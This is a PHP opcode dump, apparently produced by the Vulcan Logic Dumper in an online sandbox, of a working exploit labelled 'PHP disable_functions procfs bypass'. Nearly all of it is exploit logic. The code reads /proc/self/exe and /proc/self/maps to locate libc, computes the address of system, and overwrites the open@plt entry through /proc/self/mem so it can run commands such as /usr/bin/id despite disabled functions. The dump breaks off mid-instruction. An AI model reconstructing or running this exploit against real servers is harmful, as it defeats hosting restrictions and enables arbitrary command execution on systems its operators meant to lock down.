Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 10, Position 2 = 12
Branch analysis from position: 10
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 12
2 jumps found. (Code = 43) Position 1 = 22, Position 2 = 23
Branch analysis from position: 22
2 jumps found. (Code = 43) Position 1 = 31, Position 2 = 33
Branch analysis from position: 31
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 33
2 jumps found. (Code = 47) Position 1 = 65, Position 2 = 67
Branch analysis from position: 65
2 jumps found. (Code = 43) Position 1 = 68, Position 2 = 70
Branch analysis from position: 68
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 70
2 jumps found. (Code = 43) Position 1 = 122, Position 2 = 127
Branch analysis from position: 122
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 127
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 67
Branch analysis from position: 23
filename: /in/UXumO
function name: (null)
number of ops: 129
compiled vars: !0 = $open_php, !1 = $maps, !2 = $r, !3 = $system_offset, !4 = $open_offset, !5 = $mem, !6 = $open_addr, !7 = $libc_start, !8 = $system_addr
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
92 0 E > ECHO '%5B%2A%5D+PHP+disable_functions+procfs+bypass+%28coded+by+Beched%2C+RDot.Org%29%0A'
93 1 INIT_FCALL 'strpos'
2 INIT_FCALL 'php_uname'
3 SEND_VAL 'a'
4 DO_ICALL $9
5 SEND_VAR $9
6 SEND_VAL 'x86_64'
7 DO_ICALL $10
8 TYPE_CHECK 4 $10
9 > JMPZ ~11, ->12
94 10 > ECHO '%5B-%5D+This+exploit+is+for+x64+Linux.+Exiting%0A'
95 11 > EXIT
97 12 > INIT_FCALL 'substr'
13 INIT_FCALL 'php_uname'
14 SEND_VAL 'r'
15 DO_ICALL $12
16 SEND_VAR $12
17 SEND_VAL 0
18 SEND_VAL 4
19 DO_ICALL $13
20 IS_SMALLER $13, 2.98
21 > JMPZ ~14, ->23
98 22 > ECHO '%5B-%5D+Too+old+kernel+%28%3C+2.98%29.+Might+not+work%0A'
100 23 > ECHO '%5B%2A%5D+Trying+to+get+open%40plt+offset+in+PHP+binary%0A'
101 24 INIT_FCALL 'parseelf'
25 SEND_VAL '%2Fproc%2Fself%2Fexe'
26 SEND_VAL <true>
27 DO_FCALL 0 $15
28 ASSIGN !0, $15
102 29 IS_EQUAL !0, 0
30 > JMPZ ~17, ->33
103 31 > ECHO '%5B-%5D+Failed.+Exiting%0A'
104 32 > EXIT
106 33 > INIT_FCALL 'dechex'
34 SEND_VAR !0
35 DO_ICALL $18
36 CONCAT ~19 '%5B%2B%5D+Offset+is+0x', $18
37 CONCAT ~20 ~19, '%0A'
38 ECHO ~20
107 39 INIT_FCALL 'file_get_contents'
40 SEND_VAL '%2Fproc%2Fself%2Fmaps'
41 DO_ICALL $21
42 ASSIGN !1, $21
108 43 INIT_FCALL 'preg_match'
44 SEND_VAL '%23%5Cs%2B%28%2F.%2Blibc%5C-.%2B%29%23'
45 SEND_VAR !1
46 SEND_REF !2
47 DO_ICALL
109 48 ROPE_INIT 3 ~26 '%5B%2A%5D+Libc+location%3A+'
49 FETCH_DIM_R ~24 !2, 1
50 ROPE_ADD 1 ~26 ~26, ~24
51 ROPE_END 2 ~25 ~26, '%0A'
52 ECHO ~25
110 53 ECHO '%5B%2A%5D+Trying+to+get+open+and+system+symbols+from+Libc%0A'
111 54 INIT_FCALL 'parseelf'
55 FETCH_DIM_R ~28 !2, 1
56 SEND_VAL ~28
57 DO_FCALL 0 $29
58 FETCH_LIST_R $30 $29, 0
59 ASSIGN !3, $30
60 FETCH_LIST_R $32 $29, 1
61 ASSIGN !4, $32
62 FREE $29
112 63 IS_EQUAL ~34 !3, 0
64 > JMPNZ_EX ~34 ~34, ->67
65 > IS_EQUAL ~35 !4, 0
66 BOOL ~34 ~35
67 > > JMPZ ~34, ->70
113 68 > ECHO '%5B-%5D+Failed.+Exiting%0A'
114 69 > EXIT
116 70 > ECHO '%5B%2B%5D+Got+them.+Seeking+for+address+in+memory%0A'
117 71 INIT_FCALL 'fopen'
72 SEND_VAL '%2Fproc%2Fself%2Fmem'
73 SEND_VAL 'rb'
74 DO_ICALL $36
75 ASSIGN !5, $36
118 76 INIT_FCALL 'fseek'
77 SEND_VAR !5
78 SEND_VAR !0
79 DO_ICALL
119 80 INIT_FCALL 'unp'
81 INIT_FCALL 'fread'
82 SEND_VAR !5
83 SEND_VAL 8
84 DO_ICALL $39
85 SEND_VAR $39
86 DO_FCALL 0 $40
87 ASSIGN !6, $40
120 88 INIT_FCALL 'dechex'
89 SEND_VAR !6
90 DO_ICALL $42
91 CONCAT ~43 '%5B%2A%5D+open%40plt+addr%3A+0x', $42
92 CONCAT ~44 ~43, '%0A'
93 ECHO ~44
121 94 SUB ~45 !6, !4
95 ASSIGN !7, ~45
122 96 ADD ~47 !7, !3
97 ASSIGN !8, ~47
123 98 INIT_FCALL 'dechex'
99 SEND_VAR !8
100 DO_ICALL $49
101 CONCAT ~50 '%5B%2A%5D+system%40plt+addr%3A+0x', $49
102 CONCAT ~51 ~50, '%0A'
103 ECHO ~51
124 104 ECHO '%5B%2A%5D+Rewriting+open%40plt+address%0A'
125 105 INIT_FCALL 'fopen'
106 SEND_VAL '%2Fproc%2Fself%2Fmem'
107 SEND_VAL 'wb'
108 DO_ICALL $52
109 ASSIGN !5, $52
126 110 INIT_FCALL 'fseek'
111 SEND_VAR !5
112 SEND_VAR !0
113 DO_ICALL
127 114 INIT_FCALL 'fwrite'
115 SEND_VAR !5
116 INIT_FCALL 'packlli'
117 SEND_VAR !8
118 DO_FCALL 0 $55
119 SEND_VAR $55
120 DO_ICALL $56
121 > JMPZ $56, ->127
128 122 > ECHO '%5B%2B%5D+Address+written.+Executing+cmd%0A'
129 123 INIT_FCALL 'readfile'
124 SEND_VAL '%2Fusr%2Fbin%2Fid'
125 DO_ICALL
130 126 > EXIT
132 127 > ECHO '%5B-%5D+Write+failed.+Exiting%0A'
128 > RETURN 1
Function packlli:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/UXumO
function name: packlli
number of ops: 13
compiled vars: !0 = $value, !1 = $higher, !2 = $lower
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
23 0 E > RECV !0
24 1 BW_AND ~3 !0, 1.84467e+19
2 SR ~4 ~3, 32
3 ASSIGN !1, ~4
25 4 BW_AND ~6 !0, 4294967295
5 ASSIGN !2, ~6
26 6 INIT_FCALL 'pack'
7 SEND_VAL 'V2'
8 SEND_VAR !2
9 SEND_VAR !1
10 DO_ICALL $8
11 > RETURN $8
27 12* > RETURN null
End of function packlli
Function unp:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/UXumO
function name: unp
number of ops: 12
compiled vars: !0 = $value
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
29 0 E > RECV !0
30 1 INIT_FCALL 'hexdec'
2 INIT_FCALL 'bin2hex'
3 INIT_FCALL 'strrev'
4 SEND_VAR !0
5 DO_ICALL $1
6 SEND_VAR $1
7 DO_ICALL $2
8 SEND_VAR $2
9 DO_ICALL $3
10 > RETURN $3
31 11* > RETURN null
End of function unp
Function parseelf:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 167
Branch analysis from position: 167
2 jumps found. (Code = 44) Position 1 = 169, Position 2 = 44
Branch analysis from position: 169
2 jumps found. (Code = 43) Position 1 = 170, Position 2 = 222
Branch analysis from position: 170
1 jumps found. (Code = 42) Position 1 = 218
Branch analysis from position: 218
2 jumps found. (Code = 44) Position 1 = 221, Position 2 = 172
Branch analysis from position: 221
1 jumps found. (Code = 42) Position 1 = 275
Branch analysis from position: 275
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 172
1 jumps found. (Code = 42) Position 1 = 210
Branch analysis from position: 210
2 jumps found. (Code = 44) Position 1 = 214, Position 2 = 208
Branch analysis from position: 214
2 jumps found. (Code = 43) Position 1 = 216, Position 2 = 217
Branch analysis from position: 216
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 217
2 jumps found. (Code = 44) Position 1 = 221, Position 2 = 172
Branch analysis from position: 221
Branch analysis from position: 172
Branch analysis from position: 208
2 jumps found. (Code = 44) Position 1 = 214, Position 2 = 208
Branch analysis from position: 214
Branch analysis from position: 208
Branch analysis from position: 222
1 jumps found. (Code = 42) Position 1 = 269
Branch analysis from position: 269
2 jumps found. (Code = 44) Position 1 = 272, Position 2 = 224
Branch analysis from position: 272
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 224
1 jumps found. (Code = 42) Position 1 = 240
Branch analysis from position: 240
2 jumps found. (Code = 44) Position 1 = 244, Position 2 = 238
Branch analysis from position: 244
2 jumps found. (Code = 43) Position 1 = 246, Position 2 = 256
Branch analysis from position: 246
2 jumps found. (Code = 43) Position 1 = 258, Position 2 = 268
Branch analysis from position: 258
2 jumps found. (Code = 44) Position 1 = 272, Position 2 = 224
Branch analysis from position: 272
Branch analysis from position: 224
Branch analysis from position: 268
Branch analysis from position: 256
Branch analysis from position: 238
2 jumps found. (Code = 44) Position 1 = 244, Position 2 = 238
Branch analysis from position: 244
Branch analysis from position: 238
Branch analysis from position: 44
2 jumps found. (Code = 43) Position 1 = 58, Position 2 = 95
Branch analysis from position: 58
1 jumps found. (Code = 42) Position 1 = 166
Branch analysis from position: 166
2 jumps found. (Code = 44) Position 1 = 169, Position 2 = 44
Branch analysis from position: 169
Branch analysis from position: 44
Branch analysis from position: 95
2 jumps found. (Code = 46) Position 1 = 98, Position 2 = 100
Branch analysis from position: 98
2 jumps found. (Code = 43) Position 1 = 101, Position 2 = 126
Branch analysis from position: 101
1 jumps found. (Code = 42) Position 1 = 166
Branch analysis from position: 166
Branch analysis from position: 126
2 jumps found. (Code = 46) Position 1 = 127, Position 2 = 129
Branch analysis from position: 127
2 jumps found. (Code = 43) Position 1 = 130, Position 2 = 166
Branch analysis from position: 130
2 jumps found. (Code = 44) Position 1 = 169, Position 2 = 44
Branch analysis from position: 169
Branch analysis from position: 44
Branch analysis from position: 166
Branch analysis from position: 129
Branch analysis from position: 100
filename: /in/UXumO
function name: parseelf
number of ops: 276
compiled vars: !0 = $bin_ver, !1 = $rela, !2 = $bin, !3 = $e_shoff, !4 = $e_shentsize, !5 = $e_shnum, !6 = $e_shstrndx, !7 = $i, !8 = $sh_type, !9 = $dynsym_off, !10 = $dynsym_size, !11 = $dynsym_entsize, !12 = $strtab_off, !13 = $strtab_size, !14 = $relaplt_off, !15 = $relaplt_size, !16 = $relaplt_entsize, !17 = $r_offset, !18 = $r_info, !19 = $name_off, !20 = $name, !21 = $j, !22 = $system_offset, !23 = $open_offset
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
33 0 E > RECV !0
1 RECV_INIT !1 <false>
34 2 INIT_FCALL 'file_get_contents'
3 SEND_VAR !0
4 DO_ICALL $24
5 ASSIGN !2, $24
35 6 INIT_FCALL 'unp'
7 INIT_FCALL 'substr'
8 SEND_VAR !2
9 SEND_VAL 40
10 SEND_VAL 8
11 DO_ICALL $26
12 SEND_VAR $26
13 DO_FCALL 0 $27
14 ASSIGN !3, $27
36 15 INIT_FCALL 'unp'
16 INIT_FCALL 'substr'
17 SEND_VAR !2
18 SEND_VAL 58
19 SEND_VAL 2
20 DO_ICALL $29
21 SEND_VAR $29
22 DO_FCALL 0 $30
23 ASSIGN !4, $30
37 24 INIT_FCALL 'unp'
25 INIT_FCALL 'substr'
26 SEND_VAR !2
27 SEND_VAL 60
28 SEND_VAL 2
29 DO_ICALL $32
30 SEND_VAR $32
31 DO_FCALL 0 $33
32 ASSIGN !5, $33
38 33 INIT_FCALL 'unp'
34 INIT_FCALL 'substr'
35 SEND_VAR !2
36 SEND_VAL 62
37 SEND_VAL 2
38 DO_ICALL $35
39 SEND_VAR $35
40 DO_FCALL 0 $36
41 ASSIGN !6, $36
40 42 ASSIGN !7, 0
43 > JMP ->167
41 44 > INIT_FCALL 'unp'
45 INIT_FCALL 'substr'
46 SEND_VAR !2
47 MUL ~39 !7, !4
48 ADD ~40 !3, ~39
49 ADD ~41 ~40, 4
50 SEND_VAL ~41
51 SEND_VAL 4
52 DO_ICALL $42
53 SEND_VAR $42
54 DO_FCALL 0 $43
55 ASSIGN !8, $43
42 56 IS_EQUAL !8, 11
57 > JMPZ ~45, ->95
43 58 > INIT_FCALL 'unp'
59 INIT_FCALL 'substr'
60 SEND_VAR !2
61 MUL ~46 !7, !4
62 ADD ~47 !3, ~46
63 ADD ~48 ~47, 24
64 SEND_VAL ~48
65 SEND_VAL 8
66 DO_ICALL $49
67 SEND_VAR $49
68 DO_FCALL 0 $50
69 ASSIGN !9, $50
44 70 INIT_FCALL 'unp'
71 INIT_FCALL 'substr'
72 SEND_VAR !2
73 MUL ~52 !7, !4
74 ADD ~53 !3, ~52
75 ADD ~54 ~53, 32
76 SEND_VAL ~54
77 SEND_VAL 8
78 DO_ICALL $55
79 SEND_VAR $55
80 DO_FCALL 0 $56
81 ASSIGN !10, $56
45 82 INIT_FCALL 'unp'
83 INIT_FCALL 'substr'
84 SEND_VAR !2
85 MUL ~58 !7, !4
86 ADD ~59 !3, ~58
87 ADD ~60 ~59, 56
88 SEND_VAL ~60
89 SEND_VAL 8
90 DO_ICALL $61
91 SEND_VAR $61
92 DO_FCALL 0 $62
93 ASSIGN !11, $62
94 > JMP ->166
47 95 > ISSET_ISEMPTY_CV ~64 !12
96 BOOL_NOT ~65 ~64
97 > JMPZ_EX ~65 ~65, ->100
98 > IS_EQUAL ~66 !8, 3
99 BOOL ~65 ~66
100 > > JMPZ ~65, ->126
48 101 > INIT_FCALL 'unp'
102 INIT_FCALL 'substr'
103 SEND_VAR !2
104 MUL ~67 !7, !4
105 ADD ~68 !3, ~67
106 ADD ~69 ~68, 24
107 SEND_VAL ~69
108 SEND_VAL 8
109 DO_ICALL $70
110 SEND_VAR $70
111 DO_FCALL 0 $71
112 ASSIGN !12, $71
49 113 INIT_FCALL 'unp'
114 INIT_FCALL 'substr'
115 SEND_VAR !2
116 MUL ~73 !7, !4
117 ADD ~74 !3, ~73
118 ADD ~75 ~74, 32
119 SEND_VAL ~75
120 SEND_VAL 8
121 DO_ICALL $76
122 SEND_VAR $76
123 DO_FCALL 0 $77
124 ASSIGN !13, $77
125 > JMP ->166
51 126 > > JMPZ_EX ~79 !1, ->129
127 > IS_EQUAL ~80 !8, 4
128 BOOL ~79 ~80
129 > > JMPZ ~79, ->166
52 130 > INIT_FCALL 'unp'
131 INIT_FCALL 'substr'
132 SEND_VAR !2
133 MUL ~81 !7, !4
134 ADD ~82 !3, ~81
135 ADD ~83 ~82, 24
136 SEND_VAL ~83
137 SEND_VAL 8
138 DO_ICALL $84
139 SEND_VAR $84
140 DO_FCALL 0 $85
141 ASSIGN !14, $85
53 142 INIT_FCALL 'unp'
143 INIT_FCALL 'substr'
144 SEND_VAR !2
145 MUL ~87 !7, !4
146 ADD ~88 !3, ~87
147 ADD ~89 ~88, 32
148 SEND_VAL ~89
149 SEND_VAL 8
150 DO_ICALL $90
151 SEND_VAR $90
152 DO_FCALL 0 $91
153 ASSIGN !15, $91
54 154 INIT_FCALL 'unp'
155 INIT_FCALL 'substr'
156 SEND_VAR !2
157 MUL ~93 !7, !4
158 ADD ~94 !3, ~93
159 ADD ~95 ~94, 56
160 SEND_VAL ~95
161 SENGenerated using Vulcan Logic Dumper, using php 8.0.0